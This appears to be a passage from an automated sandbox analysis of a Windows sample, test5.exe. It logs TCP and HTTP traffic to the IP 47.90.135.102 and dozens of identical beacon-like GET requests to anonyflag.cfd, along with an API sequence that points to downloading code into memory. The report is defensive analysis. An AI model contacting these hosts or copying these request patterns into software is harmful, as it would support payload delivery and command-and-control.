        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: unknownTCP traffic detected without corresponding DNS query: 47.90.135.102
        Source: C:\Users\user\Desktop\test5.exeCode function: 0_2_0000021551B0015A HttpOpenRequestA,VirtualAlloc,InternetReadFile,0_2_0000021551B0015A
        Source: global trafficHTTP traffic detected: GET /2Vcr HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; BO1IE8_v1;ENUS)Host: 47.90.135.102Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
